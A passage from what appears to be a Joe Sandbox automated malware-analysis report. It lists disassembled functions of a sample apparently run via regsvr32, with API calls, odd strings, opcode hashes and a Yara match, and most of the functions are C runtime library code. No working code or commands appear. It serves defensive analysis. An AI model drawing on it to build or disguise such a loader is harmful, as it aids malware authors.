_errno.LIBCMT ref: 00007FF8CB7E4E9C

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: free$_errno_getptd$ErrorFreeHeapLastSleep_lock
String ID:
API String ID: 1264244385-0
Opcode ID: 2d1c73193aff0bd2fa234daa6436aaac9807f819087f81d2c1bddea91d33e348
Instruction ID: a20124e3a67a768a648b9a18122f8f5b0e8934e15ccc221206ac443d57bd32fa
Opcode Fuzzy Hash: 2d1c73193aff0bd2fa234daa6436aaac9807f819087f81d2c1bddea91d33e348
Instruction Fuzzy Hash: 3C516822A08BA28BE7549F66A44027DB7A1BF84BD8F144236DE5E473B5CF3CE911C714

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7E6C34 Relevance: 7.5, APIs: 5, Instructions: 47
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_FF_MSGBANNER.LIBCMT ref: 00007FF8CB7E6C64
RtlAllocateHeap.NTDLL(?,?,00000000,00007FF8CB7E30C0,?,?,00000000,00007FF8CB7E6B19,?,?,00000000,00007FF8CB7E6BC3), ref: 00007FF8CB7E6C89
_errno.LIBCMT ref: 00007FF8CB7E6CAD
_errno.LIBCMT ref: 00007FF8CB7E6CB8
_errno.LIBCMT ref: 00007FF8CB7E6CCD

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: _errno$AllocateHeap
String ID:
API String ID: 502529563-0
Opcode ID: d18ae8e3cce73ce1a52224a39a8d43e75eaf3a21478d7bf67846a2816eda3af9
Instruction ID: e82aa379c1b64c00b21cd595cf29f8ee5c619afc14add2454d609ce01c75a523
Opcode Fuzzy Hash: d18ae8e3cce73ce1a52224a39a8d43e75eaf3a21478d7bf67846a2816eda3af9
Instruction Fuzzy Hash: 8A113024A1DFA68BFA546FA3A8012792250DF94BE0F045634EE1D5B7F6CE3CF8418715

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7E1EE7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL ref: 00007FF8CB7E1F24
RtlDeleteBoundaryDescriptor.NTDLL ref: 00007FF8CB7E1F56

Strings

vb4vcW2kAW3Twaz?30, xrefs: 00007FF8CB7E1F6C

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: AllocateBoundaryDeleteDescriptorHeap
String ID: vb4vcW2kAW3Twaz?30
API String ID: 254689257-4179232793
Opcode ID: 08b1cf252e4ad689d9d92df66199491e9f35c83da394e0c34af369396f0aa75a
Instruction ID: bed2d4d71949e41a790b2b9179e4c51a43cdf91d604d76b0aadb9fdd5aee21c2
Opcode Fuzzy Hash: 08b1cf252e4ad689d9d92df66199491e9f35c83da394e0c34af369396f0aa75a
Instruction Fuzzy Hash: E221263260CFD68AE3208F16E4543A577A6FB88384F404535CA8D877B5DF7CA5018B44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7E2FA0 Relevance: 4.5, APIs: 3, Instructions: 35
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF8CB7E36F0: _initp_misc_winsig.LIBCMT ref: 00007FF8CB7E3729
Part of subcall function 00007FF8CB7E36F0: EncodePointer.KERNEL32(?,?,?,00007FF8CB7E2FAB,?,?,?,00007FF8CB7E2179), ref: 00007FF8CB7E3745

FlsAlloc.KERNEL32(?,?,?,00007FF8CB7E2179), ref: 00007FF8CB7E2FBB

Part of subcall function 00007FF8CB7E3108: Sleep.KERNEL32(?,?,0000000A,00007FF8CB7E2DA3,?,?,?,00007FF8CB7E2DFF,?,?,?,00007FF8CB7E254F,?,?,?,00007FF8CB7E262A), ref: 00007FF8CB7E314D

FlsSetValue.KERNEL32(?,?,?,00007FF8CB7E2179), ref: 00007FF8CB7E2FEC

Part of subcall function 00007FF8CB7E2CBC: _lock.LIBCMT ref: 00007FF8CB7E2D0C
Part of subcall function 00007FF8CB7E2CBC: _lock.LIBCMT ref: 00007FF8CB7E2D2C

GetCurrentThreadId.KERNEL32 ref: 00007FF8CB7E3000

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: _lock$AllocCurrentEncodePointerSleepThreadValue_initp_misc_winsig
String ID:
API String ID: 54287522-0
Opcode ID: 926dbc3dc0f4bcdbbdac5bfac17ca3eb5364a16ed8e4c5d99003da15ed9a218c
Instruction ID: 2945d49d484344918915b449df1b11dc398e99d9d9168246390f2d503c805145
Opcode Fuzzy Hash: 926dbc3dc0f4bcdbbdac5bfac17ca3eb5364a16ed8e4c5d99003da15ed9a218c
Instruction Fuzzy Hash: 30012860A08FA74BFB15AF77980527A32A25F047F0F140234DD2E863F1EE2CB885D224

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001BDC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 115processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE ref: 0000000180001D4C

Strings

:}, xrefs: 0000000180001C92

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: :}
API String ID: 963392458-2902022129
Opcode ID: d4da30051582f0c34577a92f260795e531c0ce67ba31d10d3ee514360786ef98
Instruction ID: 26ea99709d6fc87808755d2915912d2f892c3b8ed2aa040ac50dc8635ae9c2e3
Opcode Fuzzy Hash: d4da30051582f0c34577a92f260795e531c0ce67ba31d10d3ee514360786ef98
Instruction Fuzzy Hash: EB415A7091C7888FD7B4DF58D4857AABBE0FBC8314F108A1EE48DD7255DB7498458B82

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7E2050 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32 ref: 00007FF8CB7E2075

Strings

JKvDDasqwOPvGXZdqW, xrefs: 00007FF8CB7E205D

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: ExitProcess
String ID: JKvDDasqwOPvGXZdqW
API String ID: 621844428-4059861069
Opcode ID: deed1fdb9085c7dcd35d809f3e44395f38d7cca76780fd27941661c68abd14ec
Instruction ID: 01f4aa56559675be89c846b11231bf8342af3b381aaeae1f761bb47524e232aa
Opcode Fuzzy Hash: deed1fdb9085c7dcd35d809f3e44395f38d7cca76780fd27941661c68abd14ec
Instruction Fuzzy Hash: 08D09E25918F91C3D6209B51E80535A63A0BB99384F804131D98D46634DF7CD155C708

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7E6CEC Relevance: 3.1, APIs: 2, Instructions: 52memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF8CB7E6D0F

Part of subcall function 00007FF8CB7E66D8: DecodePointer.KERNEL32 ref: 00007FF8CB7E66FF

RtlAllocateHeap.NTDLL(?,?,?,?,00000000,00007FF8CB7E313B,?,?,0000000A,00007FF8CB7E2DA3,?,?,?,00007FF8CB7E2DFF), ref: 00007FF8CB7E6D58

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: AllocateDecodeHeapPointer_errno
String ID:
API String ID: 15861996-0
Opcode ID: 39e9772f0cc65a7484b61a3e1fb2b868eaa6fa792f1398e078783a6d2fc3ba42
Instruction ID: 556f855492a13314d901401f1bdbc90e639602b94c3a3ab49960699c82d7fe52
Opcode Fuzzy Hash: 39e9772f0cc65a7484b61a3e1fb2b868eaa6fa792f1398e078783a6d2fc3ba42
Instruction Fuzzy Hash: DF11C425B0DBA68BFF149F26E60537962919F507E4F488A34CE1D066F4DE7CE8006600

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7E36F0 Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

_initp_misc_winsig.LIBCMT ref: 00007FF8CB7E3729

Part of subcall function 00007FF8CB7E755C: EncodePointer.KERNEL32(?,?,?,?,00007FF8CB7E373E,?,?,?,00007FF8CB7E2FAB,?,?,?,00007FF8CB7E2179), ref: 00007FF8CB7E7567

EncodePointer.KERNEL32(?,?,?,00007FF8CB7E2FAB,?,?,?,00007FF8CB7E2179), ref: 00007FF8CB7E3745

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: EncodePointer$_initp_misc_winsig
String ID:
API String ID: 190222155-0
Opcode ID: 29817383cbd5b8fc12b900dc218af1d2c44829c2a488d6b4e34f3447ba8c1d75
Instruction ID: bf640828729ec7d761bec665c414ea018169abb827edb62c9ab2aca4f899f2b9
Opcode Fuzzy Hash: 29817383cbd5b8fc12b900dc218af1d2c44829c2a488d6b4e34f3447ba8c1d75
Instruction Fuzzy Hash: DEF04E10E89BA74EE919FF6368620BC22504FA6BD0F982070ED1F1A3F3DD2CE5568745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7E4110 Relevance: 3.0, APIs: 2, Instructions: 18memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(?,?,?,?,00007FF8CB7E2169), ref: 00007FF8CB7E4122
HeapSetInformation.KERNEL32 ref: 00007FF8CB7E414C

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: Heap$CreateInformation
String ID:
API String ID: 1774340351-0
Opcode ID: 489fa6aa26c4b222785c1fb3dc785f295b08bd9aa245ee8ef2e9349b67055af0
Instruction ID: 38e4265ddffa0c941a93798f112cc6ee492fdfc3b88108537616e77a9211e831
Opcode Fuzzy Hash: 489fa6aa26c4b222785c1fb3dc785f295b08bd9aa245ee8ef2e9349b67055af0
Instruction Fuzzy Hash: 63E04875A29B9183EB589F1698067656350FF58380F405039EE4D02774DF3CD0458A04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7E73F4 Relevance: 1.5, APIs: 1, Instructions: 15COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(?,?,?,00007FF8CB7E34AF,?,?,?,00007FF8CB7E21CB), ref: 00007FF8CB7E740D

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 0a2c1c774571843224449336236925bab63b88d9ce0b4f967ac09496dc1b8d3d
Instruction ID: cf64f5d25ebc9dbb4795b9c71fe50dd5781ce32746b9e8778204e5456ef1fbcb
Opcode Fuzzy Hash: 0a2c1c774571843224449336236925bab63b88d9ce0b4f967ac09496dc1b8d3d
Instruction Fuzzy Hash: 51D01732F58A9582EB108F22F59026823A4EB85BD8F588031DA5C066B9DE2CD896C701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7E3108 Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF8CB7E6CEC: _errno.LIBCMT ref: 00007FF8CB7E6D0F

Sleep.KERNEL32(?,?,0000000A,00007FF8CB7E2DA3,?,?,?,00007FF8CB7E2DFF,?,?,?,00007FF8CB7E254F,?,?,?,00007FF8CB7E262A), ref: 00007FF8CB7E314D

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: Sleep_errno
String ID:
API String ID: 1068366078-0
Opcode ID: 99b9e4cc6464749d47a71fc1b610823d805388b9272814145126b07a25ab941d
Instruction ID: 5fe35c5297a931160882fdda06cc9a29ba22822fdc7cec9bd2f29c1fb7820b4e
Opcode Fuzzy Hash: 99b9e4cc6464749d47a71fc1b610823d805388b9272814145126b07a25ab941d
Instruction Fuzzy Hash: D1014F22A24FA58AEA559F17984002AB7A5FB88FD0F491135EE6D07BB0DF3CE851C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7E309C Relevance: 1.3, APIs: 1, Instructions: 30sleepCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF8CB7E6C34: _FF_MSGBANNER.LIBCMT ref: 00007FF8CB7E6C64
Part of subcall function 00007FF8CB7E6C34: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF8CB7E30C0,?,?,00000000,00007FF8CB7E6B19,?,?,00000000,00007FF8CB7E6BC3), ref: 00007FF8CB7E6C89
Part of subcall function 00007FF8CB7E6C34: _errno.LIBCMT ref: 00007FF8CB7E6CAD
Part of subcall function 00007FF8CB7E6C34: _errno.LIBCMT ref: 00007FF8CB7E6CB8

Sleep.KERNEL32(?,?,00000000,00007FF8CB7E6B19,?,?,00000000,00007FF8CB7E6BC3,?,?,?,?,?,?,00000000,00007FF8CB7E2DC8), ref: 00007FF8CB7E30D2

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: _errno$AllocateHeapSleep
String ID:
API String ID: 4153772858-0
Opcode ID: fda341601c3db2866e613cad0830f714017b4f3b234a5a25ccfa8741b4d7d732
Instruction ID: 2be6a4b68ebcdc416fc15145a3ce47aa3fd64ad6ad7260785ff101fe6f8a88e8
Opcode Fuzzy Hash: fda341601c3db2866e613cad0830f714017b4f3b234a5a25ccfa8741b4d7d732
Instruction Fuzzy Hash: 2BF0AF32A09BD987EA519F17A48002A7361EB84BD0F450134EE6D03BB5DF3CE8928700

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF8CB7ED0B8 Relevance: 36.9, APIs: 15, Strings: 6, Instructions: 130libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF8CB7E70D4,?,?,?,?,?,00007FF8CB7E7194), ref: 00007FF8CB7ED0F5
GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF8CB7E70D4,?,?,?,?,?,00007FF8CB7E7194), ref: 00007FF8CB7ED111
GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF8CB7E70D4,?,?,?,?,?,00007FF8CB7E7194), ref: 00007FF8CB7ED139
EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF8CB7E70D4,?,?,?,?,?,00007FF8CB7E7194), ref: 00007FF8CB7ED142
GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF8CB7E70D4,?,?,?,?,?,00007FF8CB7E7194), ref: 00007FF8CB7ED158
EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF8CB7E70D4,?,?,?,?,?,00007FF8CB7E7194), ref: 00007FF8CB7ED161
GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF8CB7E70D4,?,?,?,?,?,00007FF8CB7E7194), ref: 00007FF8CB7ED177
EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF8CB7E70D4,?,?,?,?,?,00007FF8CB7E7194), ref: 00007FF8CB7ED180
GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF8CB7E70D4,?,?,?,?,?,00007FF8CB7E7194), ref: 00007FF8CB7ED19E
EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF8CB7E70D4,?,?,?,?,?,00007FF8CB7E7194), ref: 00007FF8CB7ED1A7
DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF8CB7E70D4,?,?,?,?,?,00007FF8CB7E7194), ref: 00007FF8CB7ED1D9
DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF8CB7E70D4,?,?,?,?,?,00007FF8CB7E7194), ref: 00007FF8CB7ED1E8
DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF8CB7E70D4,?,?,?,?,?,00007FF8CB7E7194), ref: 00007FF8CB7ED240
DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF8CB7E70D4,?,?,?,?,?,00007FF8CB7E7194), ref: 00007FF8CB7ED260
DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF8CB7E70D4,?,?,?,?,?,00007FF8CB7E7194), ref: 00007FF8CB7ED279

Strings

GetProcessWindowStation, xrefs: 00007FF8CB7ED194
GetActiveWindow, xrefs: 00007FF8CB7ED128
GetUserObjectInformationA, xrefs: 00007FF8CB7ED166
MessageBoxA, xrefs: 00007FF8CB7ED107
GetLastActivePopup, xrefs: 00007FF8CB7ED147
USER32.DLL, xrefs: 00007FF8CB7ED0EE

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: Pointer$AddressDecodeProc$Encode$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
API String ID: 3085332118-232180764
Opcode ID: 3571919baaed57aa13675d85a49604ff28a57139c9f79241176628fa60ae3818
Instruction ID: 2735bd8ac457b73ef24ae8a96c45a155e1c558c9bb1756071ea85af30307b3f0
Opcode Fuzzy Hash: 3571919baaed57aa13675d85a49604ff28a57139c9f79241176628fa60ae3818
Instruction Fuzzy Hash: 6451F321A0AFBB9AFE64DF97AA4057823946F45BC0F844035DC4E477B1EE7CE5468208

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7E895C Relevance: 24.4, APIs: 16, Instructions: 377COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(?,00007FF8CB7E3E11,?,?,?,?,?,00007FF8CB7E21B7), ref: 00007FF8CB7E89CE
GetLastError.KERNEL32(?,00007FF8CB7E3E11,?,?,?,?,?,00007FF8CB7E21B7), ref: 00007FF8CB7E89E4
MultiByteToWideChar.KERNEL32 ref: 00007FF8CB7E8A8E
MultiByteToWideChar.KERNEL32 ref: 00007FF8CB7E8B36
LCMapStringW.KERNEL32 ref: 00007FF8CB7E8B5B
LCMapStringW.KERNEL32 ref: 00007FF8CB7E8BAB
LCMapStringW.KERNEL32 ref: 00007FF8CB7E8C38
WideCharToMultiByte.KERNEL32 ref: 00007FF8CB7E8C7B
free.LIBCMT ref: 00007FF8CB7E8C8C
free.LIBCMT ref: 00007FF8CB7E8C9A
LCMapStringA.KERNEL32(?,00007FF8CB7E3E11,?,?,?,?,?,00007FF8CB7E21B7), ref: 00007FF8CB7E8D29
LCMapStringA.KERNEL32(?,00007FF8CB7E3E11,?,?,?,?,?,00007FF8CB7E21B7), ref: 00007FF8CB7E8DE0
free.LIBCMT ref: 00007FF8CB7E8E28
LCMapStringA.KERNEL32(?,00007FF8CB7E3E11,?,?,?,?,?,00007FF8CB7E21B7), ref: 00007FF8CB7E8E48
free.LIBCMT ref: 00007FF8CB7E8E5A
free.LIBCMT ref: 00007FF8CB7E8E6C

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: String$free$ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1446610345-0
Opcode ID: 1cb68e5ebb75471bd28e921dddda68db4bd0a605ea05e1978d1bd0bd9315b2d8
Instruction ID: 3a391eae6696c3b9d4b7f6ede092be41544f8a05b57ac8eb111a1ba606a749d7
Opcode Fuzzy Hash: 1cb68e5ebb75471bd28e921dddda68db4bd0a605ea05e1978d1bd0bd9315b2d8
Instruction Fuzzy Hash: 39F17732A08BA28BE7208F2694405A977A1FF48BE9F544635EE5D57BF4DF3CE9418700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7EC934 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 161COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 00007FF8CB7EC956
GetUserDefaultLCID.KERNEL32 ref: 00007FF8CB7ECA56
IsValidCodePage.KERNEL32 ref: 00007FF8CB7ECAA7
IsValidLocale.KERNEL32 ref: 00007FF8CB7ECABD
GetLocaleInfoA.KERNEL32 ref: 00007FF8CB7ECB38
GetLocaleInfoA.KERNEL32 ref: 00007FF8CB7ECB55
_itow_s.LIBCMT ref: 00007FF8CB7ECB73

Strings

Norwegian-Nynorsk, xrefs: 00007FF8CB7ECAF8

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: Locale$InfoValid$CodeDefaultPageUser_getptd_itow_s
String ID: Norwegian-Nynorsk
API String ID: 2273835618-461349085
Opcode ID: 27b601e54d08442215230f85cfe0824a991ba4f10c2dcca786a022abe7f281d3
Instruction ID: a09842e91031d387820dfa7cf485026fa2a7f812bb7853b62279403cf23f4ce2
Opcode Fuzzy Hash: 27b601e54d08442215230f85cfe0824a991ba4f10c2dcca786a022abe7f281d3
